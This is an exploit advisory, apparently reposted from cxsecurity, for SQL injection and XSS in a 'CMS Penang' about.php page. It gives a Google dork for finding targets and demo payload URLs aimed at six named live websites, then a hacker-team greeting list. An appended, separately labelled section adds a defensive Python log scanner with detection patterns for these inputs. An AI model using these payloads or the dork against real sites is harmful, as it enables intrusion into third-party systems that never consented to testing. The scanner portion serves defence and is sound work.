CMS Penang SQL Injection XSS

2016.07.03
Credit: Bl4ck M4n
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79, CWE-89

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|--------------------------------------------------------------[+]
|[+] Exploit Title: CMS Penang SQL Injection AND XSS
|[+]
|[+] Exploit Author: Bl4ck M4n
|[+]
|[+] Site: iedb.ir/ iedb.ir/acc xssed.ir
|[+]
|[+] Google Dork: inurl:About.php?id=
|[+]
|[+] Tested on: Windows 10, Mozilla Firefox
|[+]
|[+]
|------------------------------------------------------------[+]
|[+] Demo: XSS
|[+]
|[+] http://www.slavsandtatars.com/about.php?id=25%22%3E%3Chtml%3E%3Ch1%3EBl4ck%20M4n%20%3C/
|[+] http://www.radimpex.rs/about.php?id=1&lang=en%22%3E%3Chtml%3E%3Ch1%3EBl4ck%20M4n%20%3C/
|[+]
|[+] Demo: SQL
|[+]
|[+] http://www.micro-mechanics.com/about.php?id=3%27
|[+] https://www.radioergo.org/about.php?id=1%27
|[+] http://www.scottfss.org/about.php?id=18%27
|[+] http://www.highlandsgroup.net/about.php?ID=1%27
|[+]
|----------------------------------------------------------[+]
|[+] My Accounts :-
|[+]
|[+] ID:joker_s_hack_s@yahoo.com
|[+]
|[+] https://twitter.com/M4nBl4ck
|----------------------------------------------------[+]
|[+] G2 Team :-
|[+] Members: T34m D4rkn3ss R00m:-
|[+] 1- Nine9
|[+] 2- Safaa Hacker
|[+] 3- xIL3zr
|[+] 5- MjHoL HackEr
|[+] 6- Hurabii HaCkEr
|[+] 7- 1337r00t
|[+] 8- FreeDom
|[+] 9- Amir
|[+]-------------------------------------------[+]
|[+] Twitter : M4nBl4ck
|[+]
|[+] Greetz : Amir / B3HZ4D / Mahdi-X
|[+]
|[+] And All Member In Arbi AND Iranian
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
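Added example, not part of the original advisory: a log check a site operator running an about.php page could use to find requests shaped like the demos above (a quote in id, or markup in any parameter, as in the lang demo). The log lines are constructed samples, and the names classify and scan are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines; addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [03/Jul/2016:10:00:01 +0000] "GET /about.php?id=25 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [03/Jul/2016:10:00:07 +0000] "GET /about.php?id=3%27 HTTP/1.1" 500 312',
    '203.0.113.9 - - [03/Jul/2016:10:00:09 +0000] "GET /about.php?ID=1%27 HTTP/1.1" 500 312',
    '203.0.113.9 - - [03/Jul/2016:10:00:15 +0000] "GET /about.php?id=1&lang=en%22%3E%3Ch1%3Ex%3C/h1%3E HTTP/1.1" 200 5300',
    '203.0.113.7 - - [03/Jul/2016:10:01:00 +0000] "GET /contact.php?id=1%27 HTTP/1.1" 404 0',
]

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MARKUP = re.compile(r'[<>"]')
NUMERIC = re.compile(r'[0-9]+')


def classify(target):
    """Return (parameter, finding) pairs for one request target."""
    parts = urlsplit(target)
    # The dork uses About.php and the demos about.php, so compare lowercased.
    if not parts.path.lower().endswith("/about.php"):
        return []
    findings = []
    # parse_qsl percent-decodes, so %27 is seen as ' and %22%3E as ">
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if MARKUP.search(value):
            findings.append((name, "markup-in-parameter"))  # CWE-79 pattern
        elif "'" in value:
            findings.append((name, "quote-in-parameter"))   # CWE-89 pattern
        elif name.lower() == "id" and not NUMERIC.fullmatch(value):
            findings.append((name, "non-numeric-id"))
    return findings


def scan(lines):
    """Return (client, parameter, finding) for every flagged request."""
    hits = []
    for line in lines:
        match = REQUEST.search(line)
        if match:
            client = line.split()[0]
            for name, finding in classify(match.group(1)):
                hits.append((client, name, finding))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

The same rule that flags non-numeric id values is the server-side fix for that parameter: accept only digits for id, bind it in a parameterized query, and HTML-encode every parameter that is echoed into the page.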



Copyright 2018, cxsecurity.com

 
